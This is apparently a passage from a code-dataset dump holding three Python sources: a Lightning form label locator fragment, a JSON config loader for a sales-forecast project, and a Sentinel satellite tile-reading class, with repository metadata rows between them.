attempt will be made to find an input or textarea associated
with the label.
This is registered as a custom locator strategy named "label"
Example:
The following example is for a form with a formset named
"Expected Delivery Date", and inside of that a date input field
with a label of "Date".
These examples produce identical results:
| ${element}= Locate element by label Expected Delivery Date::Date
| ${element}= Get webelement label:Expected Delivery Date::Date
"""
if "::" in locator:
fieldset, label = [x.strip() for x in locator.split("::", 1)]
fieldset_prefix = f'//fieldset[.//*[.="{fieldset}"]]'
else:
label = locator
fieldset_prefix = ""
xpath = fieldset_prefix + (
# a label with the given text, optionally with a leading
# or trailing "*" (ie: required field)
f'//label[.="{label}" or .="*{label}" or .="{label}*"]'
# then find the nearest ancestor lightning component
'/ancestor::*[starts-with(local-name(), "lightning-")][1]'
)
elements = browser.find_elements_by_xpath(xpath)
if not elements:
# fall back to finding an input or textarea based on the 'for'
# attribute of a label
xpath = fieldset_prefix + (
"//*[self::input or self::textarea]"
f'[@id=string(//label[.="{label}" or .="*{label}" or .="{label}*"]/@for)]'
)
elements = browser.find_elements_by_xpath(xpath)
return elements
def _duration(start_date: str, end_date: str, record: dict):
try:
start_date = parse_date(start_date)
end_date = parse_date(end_date)
except (ParserError, TypeError) as e:
raise Exception(f"Date parse error: {e} in record {record}")
duration = end_date - start_date
return duration.total_seconds()
| 40.115885
| 134
| 0.628242
|
eaed9abeb02fdcf770a7bebf99b9d65ae0d1d965
| 1,740
|
py
|
Python
|
util/config_util.py
|
Genpeng/order-sales-forecast
|
c89269817a0d936900e5deb9bcc2f9a0d885382d
|
[
"Apache-2.0"
] | 3
|
2019-12-29T16:18:26.000Z
|
2020-07-05T15:39:27.000Z
|
util/config_util.py
|
Genpeng/order-sales-forecast
|
c89269817a0d936900e5deb9bcc2f9a0d885382d
|
[
"Apache-2.0"
] | null | null | null |
util/config_util.py
|
Genpeng/order-sales-forecast
|
c89269817a0d936900e5deb9bcc2f9a0d885382d
|
[
"Apache-2.0"
] | null | null | null |
# _*_ coding: utf-8 _*_
"""
Some utility functions about loading configuration file.
Author: Genpeng Xu
"""
import json
import argparse
from bunch import Bunch
def get_config_from_json(json_file):
"""
Get the configuration by reading the `json_file` and return a Bunch object,
which is attribute-style dictionary.
Argument:
json_file : str, the path to get configuration file
Return:
config : Bunch, an attribute-style dictionary object
config_dict : dict, a dictionary whose elements represent the names and its corresponding
values of configurations
"""
with open(json_file, 'r') as config_file:
config_dict = json.load(config_file)
config = Bunch(config_dict)
return config, config_dict
def process_config(json_file):
config, _ = get_config_from_json(json_file)
return config
def get_args():
parser = argparse.ArgumentParser(description="Get the path of configuration file.")
parser.add_argument('-c', '--config',
dest='config',
metavar='config_path',
default='None',
help="Specify the path to the configuration file.")
args = parser.parse_args()
return args, parser
def main():
print("[INFO] Start parsing configuration file...")
parser, config = None, None
try:
args, parser = get_args() # get the path of configuration file
config = process_config(args.config)
except Exception as e:
print(e)
if parser:
parser.print_help()
exit(0)
print(config.model_config)
print(type(config.model_config))
if __name__ == '__main__':
main()
| 25.588235
| 97
| 0.637931
|
00f054c2c63d69d6550b1df311221a60226ed63b
| 9,928
|
py
|
Python
|
sentinel_dataset/tile.py
|
ESA-PhiLab/NGVEO
|
d6346a9289f40b46f3f2c40cbb07e6afad3fbd29
|
[
"MIT"
] | 35
|
2018-10-30T07:11:29.000Z
|
2022-03-20T10:43:40.000Z
|
sentinel_dataset/tile.py
|
ESA-PhiLab/NGVEO
|
d6346a9289f40b46f3f2c40cbb07e6afad3fbd29
|
[
"MIT"
] | 5
|
2019-01-21T13:18:48.000Z
|
2022-03-11T23:32:23.000Z
|
sentinel_dataset/tile.py
|
ESA-PhiLab/NGVEO
|
d6346a9289f40b46f3f2c40cbb07e6afad3fbd29
|
[
"MIT"
] | 8
|
2018-12-20T15:42:42.000Z
|
2021-05-04T20:46:09.000Z
|
from __future__ import print_function
import json
import os
import numpy as np
from sentinel_dataset._utils import parse_eodata_folder_name
import rasterio
class Tile(object):
""" Utilities for reading tile objects"""
data_prefix = 'data_'
key_prefix_label = 'lbl_'
key_meta_data = 'meta_data'
# key_cloud_mask = 'cloud_mask'
def __init__(self, path, win=[512,512], key_missing_mask=None):
""" Constructor """
self.path = path
self.name = self.path.strip('/').split('/')[-2]
self.key_missing_mask = key_missing_mask
print(' - DataFile: Opening', self.name, self.path)
#Load meta data
with np.load( os.path.join(self.path, 'meta_data.npz')) as f:
try:
self.meta_data = f['meta_data'][()]
except:
self.meta_data = f['metadata'][()]
#Set the missing mask
if self.meta_data['sensor'] == "Sentinel-1":
self.key_missing_mask = "layover_mask"
else:
self.key_missing_mask = "cloud_mask"
# Get shape
self.shape = self.meta_data['shape']
#Load list of labelled pixels
if os.path.isfile(os.path.join(self.path, 'labelled_pixels.npz')):
with np.load(os.path.join(self.path, 'labelled_pixels.npz')) as f:
self.labelled_pixels = np.concatenate( [ np.expand_dims(f['y'],-1), np.expand_dims(f['x'],-1)], -1)
# self.labelled_pixels is matrix of shape [N,2]
self.labelled_pixels = self._remove_edge_pixels(win, self.labelled_pixels)
#Make list of non-overlapping labelled pixels
if win == [0,0]:
self.nolp = np.copy(self.labelled_pixels)
else:
self.nolp = self._make_list_of_non_overlapping_pixels(win)
else:
#When no list with labelled_pixels is provided we assume that all pixels are labelled
#Make list of non-overlapping labelled pixels
if win == [0,0]:
self.nolp = None
else:
y = np.arange(win[0]//2, self.shape[0]-win[0]//2, win[0])
x = np.arange(win[1]//2, self.shape[1]-win[1]//2, win[1] )
y, x = np.meshgrid(y, x, indexing='ij')
# import pdb; pdb.set_trace()
# Select pixels with mask==true
self.nolp = np.concatenate( [np.expand_dims(y.flatten(),1), np.expand_dims(x.flatten(),1)],1)
#Read mapinfo-json file (this is used in export_predictions_to_tif)
mapinfo_file = os.path.join(self.path, "mapinfo.json")
if os.path.isfile(mapinfo_file):
with open(mapinfo_file) as file:
self.map_info = json.load(file)
else:
self.map_info = None
print('Warning: mapinfo.json was not found. Writing predictions to tif will not be possible.')
#Update meta-data
self.meta_data.update({
'path': self.path,
})
#Add information extracted from folder-name
self.meta_data.update(
parse_eodata_folder_name(self.path.strip('/').split('/')[-1]))
#Add tile id
self.tile_id = self.meta_data['tile_id']
#Add filename
self.file_name = self.meta_data["full_name"]
#Check that bands in folder matches bands in meta_data
bands_in_folder = [f.replace(self.data_prefix,'') for f in self._get_memmap_names() if 'data_' in f]
assert(all([band_in_meta.lower() in bands_in_folder for band_in_meta in self.meta_data['bands']]))
def _make_list_of_non_overlapping_pixels(self, win):
"Get list of non-overlapping pixels (nolp) - either load, or make and save"
file_path = os.path.join(self.path, 'nolp' + str(win))
#If exist just load it
if os.path.isfile(file_path + '.npy'):
print(' -', 'Loading list of non-overlapping pixels')
return np.load(file_path+ '.npy')
#Otherwise we make it
else:
print(' ', 'Making list of non-overlapping pixels (this may take some time)')
#Define window
wl = np.array(win) // 2
wr = np.array(win) - wl
tmp_list = np.copy(self.labelled_pixels)
#Loop through and add coordinates
nolp = []
while tmp_list.shape[0] > 0:
coord = np.copy(tmp_list[0, :])
nolp.append(coord)
y, x = coord
# Remove coordinates that overlap with this pixel
overlapping_coords = np.greater(tmp_list[:, 0], y - wl[0]) * \
np.less(tmp_list[:, 0], y + wr[0]) * \
np.greater(tmp_list[:, 1], x - wl[1]) * \
np.less(tmp_list[:, 1], x + wr[1])
overlapping_coords = overlapping_coords.astype('bool')
tmp_list = tmp_list[np.logical_not(overlapping_coords), :]
print(' Samples left:', tmp_list.shape[0])
nolp = np.array(nolp)
np.save(file_path,nolp)
return nolp
def _remove_edge_pixels(self, win, coordinate_list):
if win ==[0,0]:
return coordinate_list
#Get half window size
wl = np.array(win) // 2
wr = np.array(win) - wl
#Check which pixels that are not close to edge of tile
indexes_within_bounds = np.greater(coordinate_list[:, 0], wl[0]) * \
np.less(coordinate_list[:, 0], self.shape[0] - wr[0]) * \
np.greater(coordinate_list[:, 1], wl[1]) * \
np.less(coordinate_list[:, 1], self.shape[1] - wr[1])
indexes_within_bounds = indexes_within_bounds.astype('bool')
coordinate_list = coordinate_list[indexes_within_bounds, :]
return coordinate_list
def export_prediction_to_tif(self, out_file_path, prediction):
"""
:param out_file_path:
:param prediction: a np-array where second dim indicate n-channels
:return:
"""
#Check if map-info is available
if self.map_info is None:
class MissingMapInfoException(Exception): pass
raise MissingMapInfoException()
#Compute geo-meta data
geo = self.map_info['transform']
transf = rasterio.Affine(geo[1], geo[2], geo[0], geo[4], geo[5], geo[3])
crs = {'init': self.map_info['cs_code']}
#Write to file
with rasterio.open(out_file_path, "w", driver="GTiff", compress="lzw", bigtiff="YES",
height=prediction.shape[0], width=prediction.shape[1], count=prediction.shape[2],
dtype=prediction.dtype,
crs=crs, transform=transf) as out_file:
for band_no in range(0, prediction.shape[2]):
out_file.write(prediction[:,:,band_no], band_no + 1)
print('Exported predictions to', out_file_path)
def get_meta_data(self):
return self.meta_data
def get_data(self, band_identifiers=None):
""" Reads sentinel_dataset from disk and return as a numpy array with dimensions H x W x C where C is number of channels.
This corresponds to the bands specified in band_identifiers."""
if band_identifiers == None:
band_identifiers = self.get_meta_data()['bands']
if type(band_identifiers)!= list:
band_identifiers = [band_identifiers]
return [self._open_memmap(self.data_prefix + b.lower()) for b in band_identifiers]
def get_labels(self, label_identifiers=None):
""" Reads labels from disk and return as a numpy array with dimensions H x W x C where C is number of channels.
This corresponds to the bands specified in band_identifiers."""
if type(label_identifiers)!= list:
label_identifiers = [label_identifiers]
if label_identifiers is None:
label_identifiers = [l.replace(self.key_prefix_label,'') for l in self._get_memmap_names() if self.key_prefix_label in l]
label_identifiers = [self.key_prefix_label + bi.lower() for bi in label_identifiers]
#Hack to make 'cloud_mask' be accsessible as a label
label_identifiers = [li.replace(self.key_prefix_label+self.key_missing_mask, self.key_missing_mask) for li in label_identifiers]
return [self._open_memmap(b.lower()) for b in label_identifiers]
def get_missing_mask(self):
""" Reads and returns cloud mask """
return [np.expand_dims(self._open_memmap(self.key_missing_mask),-1)]
def _get_memmap_names(self):
""" Returns list of .dat files in folder. This correspons to the data bands and label types."""
return [f.replace('.dat','') for f in os.listdir(self.path) if '.dat' in f]
def _open_memmap(self,filename):
fp = np.memmap(os.path.join(self.path, filename+'.dat'), dtype='float32', mode='r', shape=tuple(self.shape))
return fp
def get_overlapping_coordinate_no(self,no):
if hasattr(self, 'labelled_pixels'):
return self.labelled_pixels[no,:]
else:
x = no % self.shape[1]
y = int((no - x) / self.shape[0])
return np.array([y,x])
def get_non_overlapping_coordinate_no(self,no):
return self.nolp[no, :]
def n_non_overlapping(self):
return self.nolp.shape[0]
def n_overlapping(self):
if hasattr(self,'labelled_pixels'):
return self.labelled_pixels.shape[0]
else:
#Assuming all pixels are labelled
return np.prod(self.shape)
def __len__(self):
#todo: Remove this if not needed. We only keep in case it is used somewhere
return self.nolp.shape[0]
| 38.48062
| 136
| 0.592164
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.